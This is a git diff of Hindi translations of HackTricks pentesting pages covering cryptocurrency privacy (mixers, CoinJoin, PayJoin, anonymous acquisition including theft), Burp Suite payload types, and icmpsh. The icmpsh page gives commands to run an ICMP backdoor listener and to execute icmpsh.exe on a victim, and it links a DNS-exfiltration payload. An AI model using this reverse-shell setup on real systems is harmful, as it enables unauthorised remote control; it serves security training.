-* **नकद व्यापार:** नकद का उपयोग करके बिटकॉइन खरीदें। -* **नकद के समर्थक:** गिफ्ट कार्ड या समान क्रय करें और उन्हें ऑनलाइन बिटकॉइन के लिए विनिमय करें। -* **खनन:** खनन बिटकॉइन प्राप्त करने का सबसे गुमनाम तरीका है। यह सोलो-खनन के लिए लागू है क्योंकि [खनन पूल](https://en.bitcoin.it/wiki/Pooled\_mining) आम तौर पर हैशर का IP पता जानते हैं। -* **चोरी:** सिद्धांत में एक और गुमनाम तरीका बिटकॉइन प्राप्त करने का यह है कि उन्हें चुराया जाए। - -## मिक्सर - -एक उपयोगकर्ता **मिक्सिंग सेवा को बिटकॉइन भेजेगा** और सेवा **उपयोगकर्ता को विभिन्न बिटकॉइन वापस भेजेगी**, एक शुल्क कम करके। सिद्धांत में, ब्लॉकचेन को अवलोकन करने वाला दुश्मन **आने वाले और जाने वाले लेन-देन को जोड़ने में असमर्थ होगा**। - -हालांकि, उपयोगकर्ता को मिक्सिंग सेवा पर भरोसा करना होगा कि वह बिटकॉइन वापस करेगी और यह भी नहीं रिकॉर्ड सहेज रही है कि पैसे प्राप्त और भेजे गए धन के बीच संबंधों के बारे में।\ -कुछ अन्य सेवाएं भी मिक्सर के रूप में उपयोग की जा सकती हैं, जैसे बिटकॉइन कैसीनो जहां आप बिटकॉइन भेज सकते हैं और बाद में उन्हें पुनः प्राप्त कर सकते हैं। - -## कॉइनजॉइन - -**कॉइनजॉइन** एक उपयोगकर्ताओं के कई लेन-देन को केवल एक में मिलाएगा ताकि एक अवलोकक को पता लगाना अधिक **कठिन** हो जिस इनपुट किस आउटपुट से संबंधित है।\ -यह एक नई स्तर की गोपनीयता प्रदान करता है, हालांकि, **कुछ** **लेन-देन** जहां कुछ इनपुट और आउटपुट राशियाँ संबंधित हैं या बाकी इनपुट और आउटपुट से बहुत अलग हैं **बाहरी अवलोकक द्वारा संबंधित हो सकते हैं**। - -बिटकॉइन की ब्लॉकचेन पर (संभावित) कॉइनजॉइन लेन-देन आईडी के उदाहरण हैं `402d3e1df685d1fdf82f36b220079c1bf44db227df2d676625ebcbee3f6cb22a` और `85378815f6ee170aa8c26694ee2df42b99cff7fa9357f073c1192fff1f540238`। - -[**https://coinjoin.io/en**](https://coinjoin.io/en)\ -**कॉइनजॉइन के लिए समान लेकिन बेहतर और एथीरियम के लिए आपके पास** [**ट -``` +## अधिक +गोपनीयता हमलों और रक्षा की व्यापक सूची के लिए, [बिटकॉइन गोपनीयता पर बिटकॉइन विकि](https://en.bitcoin.it/wiki/Privacy) पर जाएं। +```plaintext 2 btc --> 3 btc 5 btc 4 btc ``` -# बिटकॉइन गोपनीयता अच्छी प्रथाएं +Transactions जैसे ऊपर किये गए PayJoin हो सकते हैं, जो मानक बिटकॉइन लेन-देन से अलग होते हुए गोपनीयता को बढ़ा सकते हैं। -## वॉलेट समक्रमण +**PayJoin का उपयोग पारंपरिक निगरानी विधियों को काफी व्यवधान कर सकता है**, जिससे लेन-देनीय गोपनीयता की पुरस्कृति में एक आशाजनक विकास हो सकता है। -बिटकॉइन वॉलेट को अपने शेष और इतिहास के बारे में जानकारी कैसे प्राप्त करनी चाहिए। देर से 2018 के अनुसार सबसे व्यावहारिक और निजी मौजूदा समाधान हैं एक **पूर्ण नोड वॉलेट** (जो अधिकतम निजी है) और **क्लाइंट-साइड ब्लॉक फ़िल्टरिंग** (जो बहुत अच्छा है)। +# क्रिप्टोकरेंसी में गोपनीयता के लिए सर्वोत्तम अभ्यास -* **पूर्ण नोड:** पूर्ण नोड पूरे ब्लॉकचेन को डाउनलोड करते हैं जिसमें बिटकॉइन में हुए हर ऑन-चेन [लेन-देन](https://en.bitcoin.it/wiki/Transaction) शामिल है। इसलिए एक प्रतिकूल उपयोगकर्ता की इंटरनेट कनेक्शन को देख रहे शत्रु को यह पता नहीं चलेगा कि उपयोगकर्ता किस लेन-देन या पतों में रुचि रखता है। -* **क्लाइंट-साइड ब्लॉक फ़िल्टरिंग:** क्लाइंट-साइड ब्लॉक फ़िल्टरिंग काम करता है जिसमें **फ़िल्टर** बनाए जाते हैं जो ब्लॉक में हर लेन-देन के सभी **पते** को शामिल करते हैं। फ़िल्टर यह जांच सकते हैं कि क्या कोई **तत्व सेट में है**; गलत पॉजिटिव्स संभव हैं लेकिन गलत नेगेटिव्स नहीं। एक हल्का वॉलेट सभी ब्लॉक में अपने **पतों** के साथ मेल खाता है और इसके **पास** **पते** के मिलान की जांच करता है। मिलान वाले निर्देशिका से वह ब्लॉक पूरे डाउनलोड करेगा, और उन ब्लॉक का उपयोग वॉलेट के इतिहास और वर्तमान शेष को प्राप्त करने के लिए किया जाएगा। +## **वॉलेट समक्रमण तकनीकें** -## टॉर +गोपनीयता और सुरक्षा बनाए रखने के लिए वॉलेट को ब्लॉकचेन के साथ समक्रमित करना महत्वपूर्ण है। दो तकनीकों में उत्कृष्टता है: -बिटकॉइन नेटवर्क एक पीर-टू-पीर नेटवर्क का उपयोग करता है, जिसका मतलब है कि अन्य पीयर आपका आईपी पता सीख सकते हैं। इसलिए यह सिफारिश की जाती है कि आप **बिटकॉइन नेटवर्क के साथ संवाद करना चाहते हैं तो हर बार टॉर के माध्यम से कनेक्ट करें**। +- **पूर्ण नोड**: पूर्ण नोड द्वारा पूरे ब्लॉकचेन को डाउनलोड करके, एक पूर्ण नोड गोपनीयता को अधिकतम सुनिश्चित करता है। सभी किए गए लेन-देन स्थानीय रूप से संग्रहीत होते हैं, जिससे प्रतिकूलकों को पहचानना असंभव हो जाता है कि उपयोगकर्ता किस लेन-देन या पतों में रुचि रखता है। +- **क्लाइंट-साइड ब्लॉक फ़िल्टरिंग**: यह तकनीक ब्लॉकचेन में हर ब्लॉक के लिए फ़िल्टर बनाने को शामिल है, जिससे वॉलेट नेटवर्क अवलोककर्ताओं को विशेष रुचियों को प्रकट किए बिना संबोधित लेन-देन की पहचान कर सकते हैं। हल्के वॉलेट इन फ़िल्टर्स को डाउनलोड करते हैं, केवल जब उपयोगकर्ता के पतों के साथ मेल खाता है तो पूरे ब्लॉक्स को लाते हैं। -## पते का पुनः उपयोग न करना +## **गोपनीयता के लिए Tor का उपयोग** -**पतों का अधिक से अधिक एक बार से अधिक उपयोग करना गोपनीयता के लिए बहुत हानिकारक है क्योंकि यह अधिक ब्लॉकचेन लेन-देन को जोड़ता है जिसमें यह साबित होता है कि वे एक ही एकाइ द्वारा बनाए गए थे**। बिटकॉइन का सबसे निजी और सुरक्षित तरीका यह है कि जो व्यक्ति आपको भुगतान करता है, उसे प्रत्येक व्यक्ति को एक नया पता भेजा जाए। प्राप्त किए गए सिक्के खर्च कर दिए जाने के बाद पता कभी भी फिर से उपयोग नहीं किया जाना चाहिए। साथ ही, जब बिटकॉइन भेजा जाए तो एक नया बिटकॉइन पता मांगा जाना चाहिए। सभी अच्छे बिटकॉइन वॉलेट में उपयोगकर्ता इंटरफेस होता है जो पते का पुनः उपयोग न करने की सलाह देता है। +बिटकॉइन पीयर-टू-पीयर नेटवर्क पर काम करते हुए, Tor का उपयोग आपके आईपी पते को मास्क करने के लिए सिफारिश किया जाता है, जिससे नेटवर्क के साथ बातचीत करते समय गोपनीयता में वृद्धि हो। -## एकाधिक लेन-देन +## **पते के पुनः उपयोग से बचाव** -**किसी को एक से अधिक ऑन-चेन लेन-देन के माध्यम से भुगतान करना राशि-आधारित गोपनीयता हमलों की शक्ति को बहुत कम कर सकता है जैसे कि राशि संबंध और गोल नंबर**। उदाहरण के लिए, यदि उपयोगकर्ता किसी को 5 BTC भुगतान करना चाहता है और उन्हें चाहिए कि 5 BTC मूल्य आसानी से खोजा न जा सके, तो वे 2 BTC और 3 BTC के मूल्य के लिए दो लेन-देन भेज सकते हैं जो मिलाकर 5 BTC के बराबर होते हैं। +गोपनीयता की रक्षा के लिए, प्रत्येक लेन-देन के लिए एक नया पता उपयोग करना महत्वपूर्ण है। पतों का पुनः उपयोग गोपनीयता को खतरे में डाल सकता है क्योंकि यह लेन-देन को एक ही एकता से जोड़ सकता है। आधुनिक वॉलेट अपने डिज़ाइन के माध्यम से पते के पुनः उपयोग को निषेधित करते हैं। -## बदला टालना +## **लेन-देन गोपनीयता के लिए रणनीतियाँ** -बदला टालना एक ऐसी स्थिति है जहाँ लेन-देन के इनपुट और आउटपुट को ध्यान से चुना जाता है ताकि किसी भी बदला आउटपुट की आवश्यकता न हो। **किसी भी बदला आउटपुट का न होना गोपनीयता के लिए उत्कृष्ट है**, क्योंकि यह बदला पता लगाने के नियमों को तोड़ता है। +- **एकाधिक लेन-देन**: भुगतान को कई लेन-देन में विभाजित करना लेन-देन राशि को अस्पष्ट कर सकता है, गोपनीयता हमलों को नाकाम बना सकता है। +- **बदलाव टालना**: बदलाव की आवश्यकता न होने पर, बदलाव उत्पादन के लिए लेन-देन का चयन करना गोपनीयता को बढ़ा सकता है जिससे बदलाव की पहचान की विधियों को विघटित किया जा सकता है। +- **एकाधिक बदलाव उत्पादन**: यदि बदलाव टालना संभव नहीं है, तो एकाधिक बदलाव उत्पादन भी गोपनीयता में सुधार कर सकता है। -## एकाधिक बदला आउटपुट +# **Monero: एक गोपनीयता का प्रकाश** -यदि बदला टालना एक विकल्प नहीं है तो **एक से अधिक बदला आउटपुट बनाने से गोपनीयता में सुधार हो सकता है**। यह भी बदला पता लगाने के नियमों को तोड़ता है जो सामान्यत: केवल एकल बदला आउटपुट होने का अनुमान करते हैं। जैसा कि यह विधि सामान्य से अधिक ब्लॉक स्थान का उपयोग करती है, बदला टालना अधिक अच्छा है। +Monero डिजिटल लेन-देन में पूर्ण गोपनीयता की आवश्यकता को संबोधित करता है, गोपनीयता के लिए एक उच्च मानक स्थापित करता है। -# मोनेरो +# **Ethereum: गैस और लेन-देन** -जब मोनेरो विकसित किया गया था, तो पूरी गोपनीयता की आवश्यकता थी जिसे यह हल करने का प्रयास किया गया था, और बड़े हिस्से में, यह उस शून्यता को भर दिया है। +## **गैस को समझना** -# इथेरियम +गैस एथेरियम पर ऑपरेशन को कार्यान्वित करने के लिए आवश्यक गणना प्रयास को मापता है, **ग्वेई** में मूल्यांकन किया जाता है। उदाहरण के लिए, 2,310,000 ग्वेई (या 0.00231 ईथ) का लेन-देन एक गैस सीमा और एक मूल शुल्क के साथ होता है, जिसमें खान में प्रेरित करने के लिए एक टिप शामिल है। उपयोगकर्ता अधिक भुगतान न करें, इसके अतिरिक्त रिफंड किया जाता है। -## गैस +## **लेन-देन कार्यान्वित करना** -गैस उनिट को सूचित करता है जो इथेरियम नेटवर्क पर विशेष ऑपरेशन को कार्यान्वित करने के लिए आवश्यक गणनात्मक प्रयास की मात्रा को मापता है। गैस इथेरियम पर एक लेन-देन सफलतापूर्वक करने के लिए आवश्यक शुल्क को सूचित करता है। +एथेरियम में लेन-देन एक भेजने वाले और प्राप्तकर्ता के बीच होते हैं, जो या तो उपयोगकर्ता हो सकते हैं या स्मार्ट कॉन्ट्रैक्ट पते हो सकते हैं। इन्हें एक शुल्क की आवश्यकता होती है और उन्हें खनन किया जाना चाहिए। लेन-देन में महत्वपूर्ण जानकारी में प्राप्तकर्ता, भेजने वाले के हस्ताक्षर, मूल्य, वैकल्पिक डेटा, गैस सीमा, और शुल्क शामिल हैं। विशेष रूप से, भेजने वाले का पता हस्ताक्षर से निकाला जाता है, जिससे लेन-देन डेटा में इसकी आवश्यकता नहीं होती। -गैस मूल्य को **ग्वेई** में दर्शाया जाता है, जो खुद इथ का एक मापन है - प्रत्येक ग्वेई 0.000000001 इथ (10-9 इथ) के बराबर है। उदाहरण के लिए, यदि आपका गैस 0.000000001 इथ है, तो आप कह सकते हैं कि आपका गैस 1 ग्वेई का है। 'ग्वेई' शब्द खुद में 'गिगा-वेई' का अर्थ है, और यह 1,000,000,000 वेई के बराबर है। वेई खुद इथ की **सबसे छोटी इकाई** है। +ये अभ्यास और तंत्र उन सभी लोगों के लिए मौलिक हैं जो क्रिप्टोकरेंसी के साथ संलग्न होने की दृष्टि से गोपनीयता और सुरक्षा को प्राथमिकता देते हैं। -एक लेन-देन की गैस की गणना करने के लिए इस उदाहरण को पढ़ें: +## संदर्भ -मान लें कि जॉर्डन को टेलर को 1 इथ देना है। लेन-देन में गैस सीमा 21,000 इकाइयाँ हैं और बेस शुल्क 100 ग्वेई है। जॉर्डन ने 10 ग्वेई की टिप शामिल की है। - -ऊपर दिए गए सूत्र का उपयोग करके हम इसे गणना कर सकते हैं `21,000 * (100 + 10) = 2,310,000 ग्वेई` या 0.00231 इथ। - -जब जॉर्डन पैसे भेजता है, तो 1.00231 इथ जॉर्डन के खाते से कटा जाएगा। टेलर को 1.0000 इथ क्रेडिट किया जाएगा। खननकर्ता को 0.00021 इथ की टिप मिलेगी। 0.0021 इथ का बेस शुल्क जला दिया जाएगा। - -इसके अतिरिक्त, जॉर्डन लेन-देन के लिए एक अधिकतम शुल्क (`maxFeePer +* [https://en.wikipedia.org/wiki/Proof\_of\_stake](https://en.wikipedia.org/wiki/Proof\_of\_stake) +* [https://www.mycryptopedia.com/public-key-private-key-explained/](https://www.mycryptopedia.com/public-key-private-key-explained/) +* [https://bitcoin.stackexchange.com/questions/3718/what-are-multi-signature-transactions](https://bitcoin.stackexchange.com/questions/3718/what-are-multi-signature-transactions) +* [https://ethereum.org/en/developers/docs/transactions/](https://ethereum.org/en/developers/docs/transactions/) +* [https://ethereum.org/en/developers/docs/gas/](https://ethereum.org/en/developers/docs/gas/) +* [https://en.bitcoin.it/wiki/Privacy](https://en.bitcoin.it/wiki/Privacy#Forced\_address\_reuse) diff --git a/burp-suite.md b/burp-suite.md index 4b98ff942..da6fbb694 100644 --- a/burp-suite.md +++ b/burp-suite.md @@ -1,43 +1,45 @@ +{% hint style="success" %} +सीखें और प्रैक्टिस करें AWS हैकिंग:[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +सीखें और प्रैक्टिस करें GCP हैकिंग: [**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-AWS हैकिंग सीखें शून्य से नायक तक htARTE (HackTricks AWS Red Team Expert) के साथ! +HackTricks का समर्थन करें -HackTricks का समर्थन करने के अन्य तरीके: - -* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! -* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें -* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह -* 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram समूह**](https://t.me/peass) में या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.** -* **अपनी हैकिंग ट्रिक्स साझा करें, HackTricks** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके. +* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें! +* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें। +* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) **और** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **github रेपो में।**
+{% endhint %} -# मूल Payloads +# मूल पेलोड -* **सरल सूची:** बस एक सूची जिसमें प्रत्येक पंक्ति में एक प्रविष्टि होती है -* **रनटाइम फ़ाइल:** एक सूची जो रनटाइम में पढ़ी जाती है (मेमोरी में लोड नहीं होती)। बड़ी सूचियों का समर्थन करने के लिए। -* **केस मॉडिफिकेशन:** स्ट्रिंग्स की एक सूची में कुछ परिवर्तन लागू करें (कोई परिवर्तन नहीं, निचले केस में, ऊपरी केस में, प्रॉपर नाम - पहला अक्षर बड़ा और बाकी निचले केस में-, प्रॉपर नाम -पहला अक्षर बड़ा और बाकी वैसे ही रहते हैं-। -* **संख्याएँ:** X से Y तक Z कदम या यादृच्छिक रूप से संख्याएँ उत्पन्न करें। -* **ब्रूट फोर्सर:** अक्षर सेट, न्यूनतम और अधिकतम लंबाई। +* **सरल सूची:** हर पंक्ति में एक प्रविष्टि वाली सूची +* **रनटाइम फ़ाइल:** रनटाइम में पढ़ी गई सूची (मेमोरी में लोड नहीं की गई)। बड़ी सूचियों का समर्थन करने के लिए। +* **केस संशोधन:** स्ट्रिंग की सूची पर कुछ परिवर्तन लागू करें (कोई परिवर्तन नहीं, निचे, ऊपर, सही नाम - पहले बड़ा अक्षर और बाकी को छोटा करें-, सही नाम - पहले बड़ा अक्षर और बाकी वैसा ही रहेगा-। +* **नंबर्स:** X से Y तक नंबर उत्पन्न करें Z कदम या यादृच्छिक रूप से। +* **ब्रूट फोर्सर:** वर्ण सेट, न्यूनतम और अधिकतम लंबाई। -[https://github.com/0xC01DF00D/Collabfiltrator](https://github.com/0xC01DF00D/Collabfiltrator) : DNS अनुरोधों के माध्यम से कमांड्स को निष्पादित करने और आउटपुट प्राप्त करने के लिए Payload। +[https://github.com/0xC01DF00D/Collabfiltrator](https://github.com/0xC01DF00D/Collabfiltrator) : कमांड निष्पादित करने और आउटपुट को बर्पकोलब के माध्यम से DNS अनुरोधों के माध्यम से पकड़ने के लिए पेलोड। {% embed url="https://medium.com/@ArtsSEC/burp-suite-exporter-462531be24e" %} [https://github.com/h3xstream/http-script-generator](https://github.com/h3xstream/http-script-generator) +{% hint style="success" %} +सीखें और प्रैक्टिस करें AWS हैकिंग:[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +सीखें और प्रैक्टिस करें GCP हैकिंग: [**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-AWS हैकिंग सीखें शून्य से नायक तक htARTE (HackTricks AWS Red Team Expert) के साथ! +HackTricks का समर्थन करें -HackTricks का समर्थन करने के अन्य तरीके: - -* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! -* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें -* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह -* 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram समूह**](https://t.me/peass) में या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.** -* **अपनी हैकिंग ट्रिक्स साझा करें, HackTricks** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके. +* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें! +* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें। +* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) **और** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **github रेपो में।**
+{% endhint %} diff --git a/c2/icmpsh.md b/c2/icmpsh.md index 85e6228fa..a1f27e417 100644 --- a/c2/icmpsh.md +++ b/c2/icmpsh.md @@ -1,16 +1,17 @@ +{% hint style="success" %} +एडब्ल्यूएस हैकिंग सीखें और अभ्यास करें: [**HackTricks प्रशिक्षण एडब्ल्यूएस रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +जीसीपी हैकिंग सीखें और अभ्यास करें: [**HackTricks प्रशिक्षण जीसीपी रेड टीम एक्सपर्ट (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ! +हैकट्रिक्स का समर्थन करें -HackTricks का समर्थन करने के अन्य तरीके: - -* यदि आप चाहते हैं कि आपकी **कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! -* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें -* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें -* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें। -* **अपने हैकिंग ट्रिक्स साझा करें, HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके। +* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें! +* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें। +* **हैकिंग ट्रिक्स साझा करें, पीआर जमा करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) **और** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **github रेपो में।**
+{% endhint %} बैकडोर डाउनलोड करें: [https://github.com/inquisb/icmpsh](https://github.com/inquisb/icmpsh) @@ -19,7 +20,7 @@ HackTricks का समर्थन करने के अन्य तरी स्क्रिप्ट को निष्पादित करें: **run.sh** -**यदि आपको कोई त्रुटि मिलती है, तो पंक्तियों को बदलने का प्रयास करें:** +**अगर आपको कोई त्रुटि मिलती है, तो पंक्तियों को बदलने का प्रयास करें:** ```bash IPINT=$(ifconfig | grep "eth" | cut -d " " -f 1 | head -1) IP=$(ifconfig "$IPINT" |grep "inet addr:" |cut -d ":" -f 2 |awk '{ print $1 }') @@ -29,22 +30,23 @@ IP=$(ifconfig "$IPINT" |grep "inet addr:" |cut -d ":" -f 2 |awk '{ print $1 }') echo Please insert the IP where you want to listen read IP ``` -# **शिकारक दल** +# **शिकारी पक्ष** -**icmpsh.exe** को शिकारक के पास अपलोड करें और क्रियान्वित करें: +शिकारी पक्ष पर **icmpsh.exe** अपलोड करें और क्रियान्वित करें: ```bash icmpsh.exe -t -d 500 -b 30 -s 128 ``` +{% hint style="success" %} +सीखें और प्रैक्टिस करें AWS हैकिंग: [**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +सीखें और प्रैक्टिस करें GCP हैकिंग: [**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert)! +हैकट्रिक्स का समर्थन करें -दूसरे तरीके HackTricks का समर्थन करने के लिए: - -* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! -* [**आधिकारिक PEASS & HackTricks swag प्राप्त करें**](https://peass.creator-spring.com) -* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें -* **शामिल हों** 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** पर **फॉलो** करें 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में। +* [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाँच करें! +* **शामिल हों** 💬 [**डिस्कॉर्ड ग्रुप**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम ग्रुप**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें। +* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
+{% endhint %} diff --git a/crypto-and-stego/blockchain-and-crypto-currencies.md b/crypto-and-stego/blockchain-and-crypto-currencies.md index 7298e0d99..bcca9a0f1 100644 --- a/crypto-and-stego/blockchain-and-crypto-currencies.md +++ b/crypto-and-stego/blockchain-and-crypto-currencies.md @@ -1,150 +1,143 @@ +{% hint style="success" %} +सीखें और प्रैक्टिस AWS हैकिंग:[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +सीखें और प्रैक्टिस GCP हैकिंग: [**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ! +हैकट्रिक्स का समर्थन करें -HackTricks का समर्थन करने के अन्य तरीके: - -* अगर आप चाहते हैं कि आपकी **कंपनी HackTricks में विज्ञापन दिखाए जाए** या **HackTricks को PDF में डाउनलोड** करें तो [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) देखें! -* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें -* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह, **The PEASS Family** की खोज करें -* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें। -* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में। +* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें! +* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें। +* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) और [**हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PRs सबमिट करके।
+{% endhint %} -# मूलभूत शब्दावली +## मूल अवधारणाएँ -* **स्मार्ट कॉन्ट्रैक्ट**: स्मार्ट कॉन्ट्रैक्ट्स बेसिकली **ब्लॉकचेन पर स्टोर किए गए प्रोग्राम हैं जो निश्चित स्थितियों को पूरा होने पर चलते हैं**। वे सामान्यत: **एक समझौते** के **क्रियान्वयन** को स्वचालित करने के लिए उपयोग किए जाते हैं ताकि सभी सहभागियों को परिणाम के बारे में तुरंत पता चल सके, किसी मध्यस्थ की सहायता या समय की हानि के बिना। (से [यहाँ](https://www.ibm.com/topics/smart-contracts)). -* मूल रूप से, एक स्मार्ट कॉन्ट्रैक्ट एक **कोड का टुकड़ा** है जो लोग जब उन्हें अनुबंध तक पहुंचते हैं तो क्रियान्वित होगा। स्मार्ट कॉन्ट्रैक्ट्स **ब्लॉकचेन में चलते हैं** (इसलिए परिणाम स्थायी रूप से स्टोर होते हैं) और लोग उन्हें स्वीकार करने से पहले पढ़ सकते हैं। -* **डीएपी**: **डेसेंट्रलाइज्ड एप्लिकेशन** स्मार्ट कॉन्ट्रैक्ट्स के ऊपर लागू होते हैं। उनके पास एक फ्रंट-एंड होता है जहां उपयोगकर्ता एप्लिकेशन के साथ बातचीत कर सकते हैं, **बैक-एंड** सार्वजनिक होता है (ताकि इसे मूल्यांकन किया जा सके) और एक **स्मार्ट कॉन्ट्रैक्ट** के रूप में लागू किया जाता है। कभी-कभी डेटाबेस का उपयोग आवश्यक होता है, एथेरियम ब्लॉकचेन हर खाते को निश्चित संग्रह आवंटित करता है। -* **टोकन और सिक्के**: एक **सिक्का** एक क्रिप्टोकरेंसी है जो **डिजिटल** **पैसे** के रूप में काम करता है और एक **टोकन** कुछ **मूल्य** का प्रतिनिधित्व करता है लेकिन यह एक सिक्का नहीं है। -* **यूटिलिटी टोकन्स**: ये टोकन उपयोगकर्ता को **बाद में कुछ सेवा तक पहुंचने** की अनुमति देते हैं (यह किसी विशिष्ट 